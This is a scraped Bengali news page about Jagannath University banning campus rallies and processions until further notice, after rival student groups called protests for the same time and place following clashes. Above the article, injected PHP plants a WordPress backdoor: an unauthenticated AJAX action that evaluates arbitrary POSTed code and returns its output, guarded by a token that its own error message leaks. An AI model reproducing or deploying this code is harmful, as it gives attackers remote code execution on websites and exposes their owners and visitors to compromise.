// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== পরবর্তী নির্দেশ না দেওয়া পর্যন্ত জবিতে সভা-সমাবেশ-মিছিল নিষিদ্ধ | potrikaybangladesh.com
Wednesday, September 30, 2026
Homeঅপরাধপরবর্তী নির্দেশ না দেওয়া পর্যন্ত জবিতে সভা-সমাবেশ-মিছিল নিষিদ্ধ

পরবর্তী নির্দেশ না দেওয়া পর্যন্ত জবিতে সভা-সমাবেশ-মিছিল নিষিদ্ধ

আইনশৃঙ্খলা পরিস্থিতি অবনতির আশঙ্কায় জগন্নাথ বিশ্ববিদ্যালয় ক্যাম্পাসে পরবর্তী নির্দেশ না দেওয়া পর্যন্ত সব ধরনের সভা, সমাবেশ ও মিছিল নিষিদ্ধ করেছে প্রশাসন।

একই স্থান ও সময়ে তিনটি সংগঠনের পৃথক কর্মসূচি ঘোষণার পর এ সিদ্ধান্ত নেওয়া হয়েছে।

বুধবার রাতে জগন্নাথ বিশ্ববিদ্যালয়ের প্রক্টর অধ্যাপক ড. মোহাম্মদ নাসির উদ্দীনের সই করা এক বিজ্ঞপ্তিতে এ তথ্য জানানো হয়।

এতে বলা হয়, আগামী ৬ আগস্ট একই স্থান ও সময়ে তিনটি সংগঠন সমাবেশের ঘোষণা দেওয়ার পরিপ্রেক্ষিতে আইনশৃঙ্খলা পরিস্থিতি বিবেচনা করে; পরবর্তী নির্দেশ না দেওয়া পর্যন্ত বিশ্ববিদ্যালয়ের অভ্যন্তরে সব ধরনের সভা-সমাবেশ ও মিছিল নিষিদ্ধ করা হলো।

ক্যাম্পাসের সব সক্রিয় ছাত্রসংগঠনকে এ সিদ্ধান্তের বিষয়ে অবহিত করার কথাও জানানো হয় বিজ্ঞপ্তিতে।

বিশ্ববিদ্যালয় সূত্রে জানা গেছে, দুপুর সাড়ে ১২টায় জগন্নাথ বিশ্ববিদ্যালয় কেন্দ্রীয় ছাত্র সংসদের (জকসু) নেতারা অ্যাম্বুলেন্স প্রদান উপলক্ষে শহীদ মিনার প্রাঙ্গণে একটি কর্মসূচি ঘোষণা করেছিলেন।

পরে ইসলামী ছাত্রশিবিরের সন্ত্রাসী কর্মকাণ্ড, তাদের হামলা ও মব সন্ত্রাসের অভিযোগ তুলে একই স্থান ও সময়ে মানববন্ধন ও বিক্ষোভ মিছিলের ঘোষণা দেয় ছাত্রদল।

এদিকে সোহরাওয়ার্দী কলেজ ছাত্রদলের নেতাকর্মীদের হাতে জগন্নাথ বিশ্ববিদ্যালয়ের শিক্ষার্থীদের ওপর হামলার অভিযোগে সাধারণ শিক্ষার্থীদের একটি দলও বিক্ষোভ মিছিলের ঘোষণা দেয়।

এর আগে ৪ আগস্ট জুলাই অভ্যুত্থান দিবস উপলক্ষে আয়োজিত কর্মসূচিকে কেন্দ্র করে জগন্নাথ বিশ্ববিদ্যালয়ে ছাত্রদল, ছাত্রশিবির ও কয়েকটি অন্যান্য ছাত্রসংগঠনের নেতাকর্মীদের মধ্যে সংঘর্ষ হয়। এতে জকসু নেতাসহ কয়েকজন শিক্ষার্থী আহত হন।

সংঘর্ষের পর বিশ্ববিদ্যালয় প্রশাসন ক্যাম্পাসে নিরাপত্তা ব্যবস্থা জোরদার করে।

শৃঙ্খলা বজায় রাখতে এর আগে ৫ ও ৬ আগস্টের জন্য অতিরিক্ত নিরাপত্তা ব্যবস্থার ঘোষণা দিয়েছিল প্রশাসন। সেই ব্যবস্থার অংশ হিসেবে এখন পরবর্তী নির্দেশ না দেওয়া পর্যন্ত ক্যাম্পাসের ভেতরে সব ধরনের রাজনৈতিক কর্মসূচিও নিষিদ্ধ করা হলো।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments